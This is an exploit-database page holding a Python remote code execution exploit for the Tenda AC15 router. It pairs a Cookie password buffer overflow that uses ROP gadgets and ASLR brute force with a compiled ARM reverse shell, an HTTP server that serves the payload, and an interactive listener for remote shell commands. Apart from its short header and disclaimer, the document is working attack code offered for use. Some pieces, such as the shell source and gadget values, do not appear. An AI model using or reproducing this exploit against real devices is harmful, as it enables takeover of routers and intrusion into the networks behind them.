Exploits / Vulnerability Discovered : 2018-02-14 |
Type : remote |
Platform : hardware
This exploit / vulnerability Tenda ac15 router remote code execution is for educational purposes only and if it is used you will do on your own risk!
"""
* This function creates a listening socket on port
* REV_PORT. When a connection is accepted it updates
* the global DONE flag to indicate successful exploitation.
* It then jumps into a loop whereby the user can send remote
* commands to the device, interacting with a spawned /bin/sh
* process.
"""
def threaded_listener():
global DONE
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
print "[+] Connect back listener running on port %d" %REV_PORT
s.listen(1)
conn, host = s.accept()
#We got a connection, lets make the exploit thread aware
DONE = True
print "[+] Got connect back from %s" %host[0]
print "[+] Entering command loop, enter exit to quit"
#Loop continuosly, simple reverse shell interface.
while True:
print "#",
cmd = raw_input()
if cmd == "exit":
break
if cmd == '':
continue
conn.send(cmd + "\n")
print conn.recv(4096)
"""
* Take the ARM_REV_SHELL code and modify it with
* the given ip and port to connect back to.
* This function then compiles the code into an
* ARM binary.
@Param comp_path – This should be the path of the cross-compiler.
@Param my_ip – The IP address of the system running this code.
"""
def compile_shell(comp_path, my_ip):
global ARM_REV_SHELL
outfile = open("a.c", "w")
ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)
outfile.write(ARM_REV_SHELL)
outfile.close()
compile_cmd = [comp_path, "a.c","-o", "a"]
s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
while s.poll() == None:
continue
if s.returncode == 0:
return True
else:
print "[x] Error compiling code, check compiler? Read the README?"
return False
"""
* This function uses the SimpleHTTPServer module to create
* a http server that will serve our malicious binary.
* This function is called as a thread, as a daemon process.
"""
def start_http_server():
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", HTTPD_PORT), Handler)
print "[+] Http server started on port %d" %HTTPD_PORT
httpd.serve_forever()
"""
* This function presents the actual vulnerability exploited.
* The Cookie header has a password field that is vulnerable to
* a sscanf buffer overflow, we make use of 2 ROP gadgets to
* bypass DEP/NX, and can brute force ASLR due to a watchdog
* process restarting any processes that crash.
* This function will continually make malicious requests to the
* devices web interface until the DONE flag is set to True.
@Param host – the ip address of the target.
@Param port – the port the webserver is running on.
@Param my_ip – The ip address of the attacking system.
"""
def exploit(host, port, my_ip):
global DONE
url = "http://%s:%s/goform/exeCommand"%(host, port)
i = 0
password = "A"*offset
password += pop + system + "B"*8 + mv_r0_sp + command + ".gif"
print "[+] Beginning brute force."
while not DONE:
i += 1
print "[+] Attempt %d" %i
#build the request, with the malicious password field
req = urllib2.Request(url)
req.add_header("Cookie", "password=%s"%password)
#The request will throw an exception when we crash the server,
#we don't care about this, so don't handle it.
try:
resp = urllib2.urlopen(req)
except:
pass
#Give the device some time to restart the
time.sleep(1)
print "[+] Exploit done"
def main():
parser = OptionParser()
parser.add_option("-t", "–target", dest="host_ip", help="IP address of the target")
parser.add_option("-p", "–port", dest="host_port", help="Port of the targets webserver")
parser.add_option("-c", "–comp-path", dest="compiler_path", help="path to arm cross compiler")
parser.add_option("-m", "–my-ip", dest="my_ip", help="your ip address")
if host_ip == None or host_port == None:
parser.error("[x] A target ip address (-t) and port (-p) are required")
if comp_path == None:
parser.error("[x] No compiler path specified, you need a uclibc arm cross compiler, such as https://www.uclibc.org/downloads/binaries/0.9.30/cross-compiler-arm4l.tar.bz2")
if my_ip == None:
parser.error("[x] Please pass your ip address (-m)")
if not compile_shell(comp_path, my_ip):
print "[x] Exiting due to error in compiling shell"
return -1